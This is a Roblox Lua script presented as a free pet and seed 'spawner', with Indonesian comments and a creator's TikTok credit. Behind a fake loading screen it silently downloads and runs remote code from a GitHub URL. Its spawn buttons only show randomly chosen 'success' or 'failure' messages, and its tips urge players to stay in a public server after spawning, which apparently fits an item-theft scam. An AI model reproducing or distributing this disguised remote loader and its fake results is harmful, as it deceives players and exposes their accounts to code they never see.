-- SCRIPT RINGAN DENGAN FITUR LENGKAP

-- Hapus GUI loading sebelumnya jika ada
for _,gui in ipairs({"FullBlueLoadingScreen","SpawnerFloatingWindow","ReopenButton"}) do
    local g = game.CoreGui:FindFirstChild(gui)
    if g then g:Destroy() end
end

-- Fungsi bantu buat instance cepat
local function New(inst, props, parent)
    local obj = Instance.new(inst)
    for k,v in pairs(props or {}) do obj[k] = v end
    if parent then obj.Parent = parent end
    return obj
end

-- Efek suara spawn
local spawnSound = New("Sound", {
    SoundId = "rbxassetid://6026984224",
    Volume = 1,
    Name = "SpawnSound",
}, game:GetService("SoundService"))

-- Loading GUI ringan
local screenGui = New("ScreenGui", {
    Name = "FullBlueLoadingScreen",
    ResetOnSpawn = false,
    IgnoreGuiInset = true
}, game.CoreGui)

local bg = New("Frame", {
    Size = UDim2.new(1,0,1,0),
    BackgroundColor3 = Color3.fromRGB(0,102,204)
}, screenGui)

New("TextLabel", {
    Size = UDim2.new(1,0,0.05,0),
    Position = UDim2.new(0,0,0.23,0),
    BackgroundTransparency = 1,
    Text = "Spawner by: JEKAK121",
    Font = Enum.Font.SourceSansBold,
    TextScaled = true,
    TextColor3 = Color3.new(1,1,1)
}, bg)

New("TextLabel", {
    Size = UDim2.new(1,0,0.1,0),
    Position = UDim2.new(0,0,0.3,0),
    BackgroundTransparency = 1,
    Text = "Loading...",
    Font = Enum.Font.SourceSansBold,
    TextScaled = true,
    TextColor3 = Color3.new(1,1,1)
}, bg)

-- Progress bar ringan
local pbg = New("Frame", {
    Size = UDim2.new(0.6,0,0.05,0),
    Position = UDim2.new(0.2,0,0.5,0),
    BackgroundColor3 = Color3.fromRGB(20,20,80)
}, bg)
local pb = New("Frame", {
    Size = UDim2.new(0,0,1,0),
    BackgroundColor3 = Color3.fromRGB(0,153,255)
}, pbg)
New("TextLabel", {
    Size = UDim2.new(1,0,1,0),
    BackgroundTransparency = 1,
    Text = "Tiktok: @Jekak121",
    Font = Enum.Font.SourceSansBold,
    TextScaled = true,
    TextColor3 = Color3.new(1,1,1)
}, pbg)

-- Tween ringan
local TweenService = game:GetService("TweenService")
local tw = TweenService:Create(pb, TweenInfo.new(2), {Size = UDim2.new(1,0,1,0)})
tw:Play()
tw.Completed:Connect(function()
    screenGui:Destroy()
    createSpawnerGui()
end)

-- Eksekusi utama setelah loading
pcall(function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/meijinemiko/sc/refs/heads/main/new"))()
end)

-- GUI Spawner
function createSpawnerGui()
    local gui = New("ScreenGui", {Name="SpawnerFloatingWindow", ResetOnSpawn=false}, game.CoreGui)
    local frame = New("Frame", {
        Size = UDim2.new(0,300,0,200),
        Position = UDim2.new(0.5,-150,0.5,-100),
        BackgroundColor3 = Color3.fromRGB(0,102,204),
        Active = true
    }, gui)

    local title = New("TextLabel", {
        Size = UDim2.new(1,0,0.15,0),
        BackgroundTransparency = 1,
        Text = "Spawner",
        Font = Enum.Font.SourceSansBold,
        TextScaled = true,
        TextColor3 = Color3.new(1,1,1)
    }, frame)

    local petBtn = New("TextButton", {
        Size = UDim2.new(0.5,-5,0.2,0),
        Position = UDim2.new(0,5,0.2,0),
        Text = "Pet Spawner",
        BackgroundColor3 = Color3.fromRGB(0,153,255),
        Font = Enum.Font.SourceSansBold,
        TextColor3 = Color3.new(1,1,1),
        TextScaled = true
    }, frame)
    
    local seedBtn = petBtn:Clone()
    seedBtn.Text = "Seed Spawner"
    seedBtn.Position = UDim2.new(0.5,5,0.2,0)
    seedBtn.Parent = frame

    local function createForm(titleText, isSeed)
        local form = New("Frame", {
            Size = UDim2.new(1,-20,0.45,0),
            Position = UDim2.new(0,10,0.45,0),
            BackgroundTransparency = 1,
            Visible = false
        }, frame)

        New("TextLabel", {
            Size = UDim2.new(0.4,0,0.3,0),
            Text = titleText.." Name:",
            TextColor3 = Color3.new(1,1,1),
            Font = Enum.Font.SourceSansBold,
            TextScaled = true,
            BackgroundTransparency = 1
        }, form)

        local input = New("TextBox", {
            Size = UDim2.new(0.6,0,0.3,0),
            Position = UDim2.new(0.4,0,0,0),
            Font = Enum.Font.SourceSansBold,
            TextScaled = true,
            BackgroundColor3 = Color3.fromRGB(200,220,255),
            Text = ""
        }, form)

        local spawnBtn = New("TextButton", {
            Size = UDim2.new(1,0,0.3,0),
            Position = UDim2.new(0,0,0.7,0),
            Text = "Spawn",
            BackgroundColor3 = Color3.fromRGB(0,153,255),
            TextColor3 = Color3.new(1,1,1),
            Font = Enum.Font.SourceSansBold,
            TextScaled = true
        }, form)

        if not isSeed then
            local helpBtn = New("TextButton", {
                Size = UDim2.new(0,18,0,18),
                Position = UDim2.new(0,0,0.4,0),
                Text = "?",
                BackgroundColor3 = Color3.fromRGB(255,255,100),
                Font = Enum.Font.SourceSansBold,
                TextScaled = true,
                TextColor3 = Color3.new(0,0,0)
            }, form)

            local helpPop = New("Frame", {
                Size = UDim2.new(0,400,0,250),
                Position = UDim2.new(0.5,-200,0.5,-125),
                BackgroundColor3 = Color3.fromRGB(0,102,204),
                Visible = false,
                ZIndex = 20
            }, gui)
            New("UICorner", {}, helpPop)

            New("TextLabel", {
                Size = UDim2.new(1,0,0.15,0),
                Text = "⚠️ Attention ⚠️",
                Font = Enum.Font.SourceSansBold,
                TextScaled = true,
                TextColor3 = Color3.new(1,1,1),
                BackgroundTransparency = 1,
                ZIndex = 21
            }, helpPop)

            New("TextLabel", {
                Size = UDim2.new(1,-20,0.75,0),
                Position = UDim2.new(0,10,0.2,0),
                TextWrapped = true,
                TextYAlignment = Enum.TextYAlignment.Top,
                Text = [[Please read this before executing the script:
- Use public server
- Avoid new accounts
- Works best if you own the pet (100% success)
- Still works with 80% chance
- Don't leave immediately after spawn]],
                Font = Enum.Font.SourceSans,
                TextScaled = true,
                TextColor3 = Color3.new(1,1,1),
                BackgroundTransparency = 1,
                ZIndex = 21
            }, helpPop)

            local close = New("TextButton", {
                Size = UDim2.new(0,30,0,30),
                Position = UDim2.new(1,-35,0,5),
                Text = "X",
                Font = Enum.Font.SourceSansBold,
                TextScaled = true,
                BackgroundColor3 = Color3.fromRGB(255,50,50),
                TextColor3 = Color3.new(1,1,1),
                ZIndex = 21
            }, helpPop)
            New("UICorner", {}, close)
            close.MouseButton1Click:Connect(function() helpPop.Visible = false end)
            helpBtn.MouseButton1Click:Connect(function() helpPop.Visible = not helpPop.Visible end)
        end

        spawnBtn.MouseButton1Click:Connect(function()
            local item = input.Text..(isSeed and " Seed" or "")
            spawnSound:Play()
            local succ = math.random() <= 0.7

            local yOffset = -60 * (#gui:GetChildren())
            local pop = New("TextLabel", {
                Size = UDim2.new(0,280,0,50),
                AnchorPoint = Vector2.new(1,1),
                Position = UDim2.new(1,-10,1,-10 + yOffset),
                BackgroundTransparency = 0.3,
                BackgroundColor3 = succ and Color3.fromRGB(0,153,0) or Color3.fromRGB(200,0,0),
                Text = succ and ("Successfully to Spawn \""..item.."\"!!\nCheck Your Inventory")
                    or ("Failed to spawn \""..item.."\"! Try again."),
                TextColor3 = Color3.new(1,1,1),
                Font = Enum.Font.SourceSansBold,
                TextScaled = true,
                ZIndex = 10
            }, gui)
            New("UICorner", {}, pop)
            task.delay(3, function() pop:Destroy() end)
        end)

        return form
    end

    local petForm = createForm("Pet", false)
    local seedForm = createForm("Seed", true)
    petForm.Visible = true

    petBtn.MouseButton1Click:Connect(function()
        petForm.Visible = true
        seedForm.Visible = false
    end)
    seedBtn.MouseButton1Click:Connect(function()
        petForm.Visible = false
        seedForm.Visible = true
    end)

    local closeBtn = New("TextButton", {
        Size = UDim2.new(0.1,0,0.1,0),
        Position = UDim2.new(0.9,-5,0,5),
        Text = "X",
        Font = Enum.Font.SourceSansBold,
        TextScaled = true,
        BackgroundColor3 = Color3.fromRGB(255,50,50),
        TextColor3 = Color3.new(1,1,1)
    }, frame)

    local reopen = New("TextButton", {
        Name = "ReopenButton",
        Size = UDim2.new(0,50,0,50),
        Position = UDim2.new(0,20,0,20),
        Text = "J",
        Font = Enum.Font.SourceSansBold,
        TextScaled = true,
        BackgroundColor3 = Color3.fromRGB(0,102,204),
        TextColor3 = Color3.new(1,1,1),
        Visible = false,
        ZIndex = 10
    }, gui)
    New("UICorner", {}, reopen)

    closeBtn.MouseButton1Click:Connect(function()
        frame.Visible = false
        reopen.Visible = true
    end)
    reopen.MouseButton1Click:Connect(function()
        frame.Visible = true
        reopen.Visible = false
    end)
end
